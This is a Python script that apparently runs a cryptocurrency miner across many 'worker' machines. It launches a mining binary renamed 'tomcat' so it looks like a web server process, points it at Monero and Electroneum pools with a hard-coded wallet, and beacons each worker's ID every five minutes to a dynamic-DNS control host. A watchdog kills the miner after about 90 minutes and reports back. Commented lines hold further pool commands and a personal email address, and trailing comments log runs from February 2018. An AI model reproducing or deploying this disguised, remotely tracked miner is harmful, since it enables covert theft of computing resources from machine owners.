import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:32:02.199358
#2018-02-17 16:17:03.523621
#2018-02-17 18:06:07.580800
#2018-02-17 19:53:01.615776
#2018-02-17 21:40:06.255790
#2018-02-17 23:24:05.403943
#2018-02-18 01:13:02.108553
#2018-02-18 02:59:04.921163
#2018-02-18 04:48:01.995353
#2018-02-18 06:37:04.127906
#2018-02-18 08:26:05.459791
#2018-02-18 10:14:03.885587
#2018-02-18 11:59:07.767434
#2018-02-18 13:45:04.356353
#2018-02-18 15:37:04.496353
#2018-02-18 17:26:05.223923
#2018-02-18 19:14:02.112488
#2018-02-18 21:00:01.628692
#2018-02-18 22:45:08.416124
#2018-02-19 00:34:05.713339
#2018-02-19 02:19:05.942451
#2018-02-19 04:07:08.157999
#2018-02-19 05:51:03.896099
#2018-02-19 07:39:01.508827
#2018-02-19 09:28:06.078935
#2018-02-19 11:17:07.998490
#2018-02-19 13:05:08.665024
#2018-02-19 14:53:06.493935
#2018-02-19 16:40:10.105868
#2018-02-19 18:27:06.042810
#2018-02-19 20:13:02.179035
#2018-02-19 22:03:01.856047
#2018-02-19 23:48:05.076013
#2018-02-20 01:36:01.888006
#2018-02-20 03:24:04.856574
#2018-02-20 05:11:01.938798
#2018-02-20 06:54:01.948587
#2018-02-20 08:40:08.063903
#2018-02-20 10:24:05.561194
#2018-02-20 12:08:06.842628
#2018-02-20 13:57:06.649565
#2018-02-20 15:40:07.912016
#2018-02-20 17:27:05.960889
#2018-02-20 19:16:05.709173
#2018-02-20 21:04:07.596613
#2018-02-20 22:50:06.678183
#2018-02-21 00:34:08.424245
#2018-02-21 02:22:05.428916
#2018-02-21 04:08:04.599997
#2018-02-21 05:55:02.951291
#2018-02-21 07:43:12.187963
#2018-02-21 09:27:07.258236
#2018-02-21 11:16:06.908450
#2018-02-21 13:06:02.139372
#2018-02-21 14:53:07.473556
#2018-02-21 16:42:08.966204
#2018-02-21 18:31:04.568511
#2018-02-21 20:15:10.395475
#2018-02-21 22:04:07.260117
#2018-02-21 23:49:07.130153
#2018-02-22 01:41:04.247120
#2018-02-22 03:28:06.748412
#2018-02-22 05:15:07.727687
#2018-02-22 06:59:01.677674
#2018-02-22 08:46:04.424847
#2018-02-22 10:34:01.400793
#2018-02-22 12:21:05.310561
#2018-02-22 14:04:04.044836
#2018-02-22 15:51:01.768485
#2018-02-22 17:38:05.363492
#2018-02-22 19:24:06.857342
#2018-02-22 21:15:06.987134
#2018-02-22 22:59:07.601041
#2018-02-23 00:45:03.359428
#2018-02-23 02:32:08.736566
#2018-02-23 04:21:01.697423
#2018-02-23 06:08:06.083765
#2018-02-23 07:55:07.130640
#2018-02-23 10:16:01.323387
#2018-02-23 12:04:02.107135
#2018-02-23 13:51:08.162500
#2018-02-23 15:43:05.253919
#2018-02-23 17:28:09.639073
#2018-02-23 19:13:08.943601
#2018-02-23 20:58:05.750472
#2018-02-23 22:46:06.469467
#2018-02-24 00:34:06.464561
#2018-02-24 02:25:07.471070
#2018-02-24 04:14:07.859730
#2018-02-24 06:02:07.582527
#2018-02-24 07:50:07.816622
#2018-02-24 09:36:07.757769
#2018-02-24 11:31:04.300490
#2018-02-24 13:21:02.082811
#2018-02-24 15:10:07.490491
#2018-02-24 16:59:07.227538
#2018-02-24 18:47:07.289872
#2018-02-24 20:37:03.841244
#2018-02-24 22:43:06.361065
#2018-02-25 02:05:04.214290
#2018-02-25 05:38:06.673826
#2018-02-25 11:35:05.987623